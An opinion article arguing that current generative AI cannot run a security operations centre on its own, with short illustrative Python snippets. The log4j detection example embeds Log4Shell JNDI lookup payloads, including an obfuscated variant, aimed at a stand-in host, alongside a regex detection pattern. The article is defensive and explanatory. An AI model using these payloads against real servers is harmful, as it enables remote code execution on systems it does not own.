Cybersecurity is experiencing an AI revolution. Every day, new products and features are announced that leverage LLMs to make security operations faster, more accurate, and more efficient. The most enthusiastic experts are already talking about fully autonomous SOCs and declaring that the job of the security analyst is destined to disappear.
But are we really so close to AI taking over threat detection and response capabilities?
The arrival of an AI singularity is still a possibility, so we can’t say we’ll never have fully autonomous, AI-powered SOCs. But claiming that the current wave of AI capabilities will get us there is naive at best, and often disingenuous marketing by technology vendors.
Generative AI capabilities are certainly impressive, but they still have limitations. Trained on large amounts of data, GenAI systems can create text, images, and even music. However, these creations are bounded by the ideas and concepts humans have already produced; genuinely original ideas remain beyond current systems.
These systems are limited because they don’t understand the concepts or ideas they’re dealing with; they simply generate a stream of text that resembles their training data. We’re amazed that such a simple approach seems so close to real intelligence, but a deeper look reveals clear signs of what some call “glorified autocomplete.”
A few examples of “failures” of these systems can help us better understand their limitations. The struggles of many LLMs to properly answer questions like “how many r’s are in ‘strawberry’” or “what is the world record for walking across the English Channel” perfectly illustrate the issue. It’s not that ChatGPT or other systems are ignorant; they simply don’t know what they’re “saying.” It becomes hard even to call these mistakes failures once you realize the systems have no cognitive grasp of the concepts being communicated.
You may wonder, then, why we see so many interesting and useful implementations of these technologies. The answer is that they perform well on problems where the lack of cognition, or of a complete understanding of the data and the concepts behind it, is not a major disadvantage. LLMs are ideal, for example, for generating text summaries.
So one of the most successful applications of AI in security operations is producing text descriptions and summaries of incidents and investigations. Another great use case for LLMs is generating search queries and detection code from human-written descriptions. But for now, that is largely where it stops.
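To make the query-generation use case concrete, here is a minimal sketch, assuming the OpenAI Python SDK (openai>=1.0) and Splunk SPL as the target query language; the model name, prompt wording, and analyst request are illustrative placeholders, not a recommendation of any particular product.

```python
# Minimal sketch: turning an analyst's plain-English request into a log
# search query with an LLM. Assumes OPENAI_API_KEY is set in the environment.
from openai import OpenAI

client = OpenAI()

analyst_request = (
    "Find failed RDP logons from external IP addresses in the last 24 hours, "
    "grouped by source address."
)

response = client.chat.completions.create(
    model="gpt-4o-mini",  # placeholder model name
    messages=[
        {
            "role": "system",
            "content": (
                "You translate analyst requests into Splunk SPL queries. "
                "Return only the query, with no explanation."
            ),
        },
        {"role": "user", "content": analyst_request},
    ],
)

print(response.choices[0].message.content)
```

Even in this friendly scenario the output is a draft: an analyst still has to check field names, time ranges, and logic before the query goes anywhere near production.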
Threat detection itself is a higher-risk area for SOCs using LLMs, because the model can appear perfectly capable of creating detection content. Asking Microsoft Copilot something like “Generate a Sigma rule to detect log4j attacks” produces good results. However, a closer look at that prompt and the generated answer reveals the limitations of AI in threat detection.
By saying “log4j attack,” we are asking the model to build content about well-known attacks. Before any of that content could be generated, humans had to find these attacks, understand them properly, and describe them. There is an unavoidable lag between the moment the first attack occurs and the moment the AI can ingest that human-produced analysis and generate rules from it. This is clearly not the detection of an unknown attack.
The rules it creates are generic, built around the best-known exploits of known vulnerabilities. This works, but it is a weak approach that produces just as many false positives and false negatives as the rules written by an average human analyst.
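As a rough illustration of why, here is a minimal sketch, not any vendor’s actual rule, of the keyword-style logic such generated rules usually boil down to, using the well-known ${jndi: indicator from the Log4Shell exploit; the log lines are fabricated for the example.

```python
import re

# The kind of generic pattern that generated log4j rules tend to encode:
# look for the classic JNDI lookup string in web request logs.
NAIVE_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

log_lines = [
    # Textbook exploit attempt: caught.
    "GET /search?q=${jndi:ldap://evil.example.com/a} HTTP/1.1",
    # Obfuscated variant using nested lookups: missed (false negative).
    "GET /search?q=${${lower:j}${lower:n}di:ldap://evil.example.com/a} HTTP/1.1",
    # A scanner or a write-up quoting the payload: flagged anyway, which in
    # many environments is just noise (false positive).
    "GET /docs/log4shell-writeup?sample=${jndi:ldap://127.0.0.1/} HTTP/1.1",
]

for line in log_lines:
    verdict = "ALERT" if NAIVE_PATTERN.search(line) else "no match"
    print(f"{verdict:8} {line}")
```

Nothing in a rule like this reasons about what the application actually does with the string; it only recognizes a shape that humans have already documented.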
People get excited about the power of these new models and claim that LLMs will soon be able to detect unknown attacks. Given the limitations of the technology and the very nature of unknown attacks, this is a mistake. To better understand the limits of not only AI but also traditional detection systems, consider the emergence of fileless attacks.
Malware detection systems used to focus only on files written to disk: hooks were available to call an analyzer every time something was written. What if we had a highly efficient AI-based analyzer doing that job? Would we have the perfect anti-malware solution? No, we wouldn’t. Attackers have moved their playground to places where data is not collected for analysis. Fileless malware is injected directly into memory and never written to disk, so the super-analyzer is never exposed to the malicious code. The original assumption that all malware touches the disk no longer holds, and the AI system simply isn’t looking in the right place.
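A toy illustration of that blind spot, not real endpoint tooling: the detector below is wired only to a hypothetical file-write event, so a payload that stays in memory is never even presented to it, no matter how accurate the classifier is.

```python
# Toy illustration: a scanner hooked only to disk writes never sees
# fileless payloads. All names and logic here are hypothetical.

def ai_scan(payload: bytes) -> bool:
    """Stand-in for a hypothetical, highly accurate AI malware classifier."""
    return b"malicious" in payload  # placeholder logic


def on_file_write(path: str, payload: bytes) -> None:
    """The hook described above: invoked for every write to disk."""
    if ai_scan(payload):
        print(f"BLOCKED write to {path}")
    else:
        print(f"allowed write to {path}")


# Classic malware drops a file, the hook fires, and the scanner gets a look.
on_file_write("C:/Users/victim/update.exe", b"...malicious payload...")

# A fileless attack injects its payload straight into process memory.
# No file write happens, on_file_write is never called, and the "perfect"
# classifier is never consulted; the blind spot is structural, not a matter
# of model accuracy.
in_memory_payload = b"...malicious payload..."
```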
Why new attacks are hard to detect
Smart attackers figure out how detection systems work and develop new attacks outside the visibility of the detection engines. Attack sophistication occurs at multiple levels, and those levels often sit outside the areas where detection capabilities are deployed. An IP network may be fully instrumented to capture traffic, yet all of that instrumentation is useless if one of its systems is compromised through a Bluetooth vulnerability.
No AI system can analyze attack behavior at that level, spot the differences from previous behavior, and design a solution to compensate for those changes. That remains a job for humans, and will remain so until artificial general intelligence (AGI) arrives.
Know the limits of AI in the SOC
As with any tool, you need to understand its value, where it helps, and where its limits lie. We get a lot of value from GenAI-based capabilities that support security operations, but they are not a panacea. Organizations should not stretch these tools into areas they are not suited for; otherwise, the results will be not only disappointing but disastrous.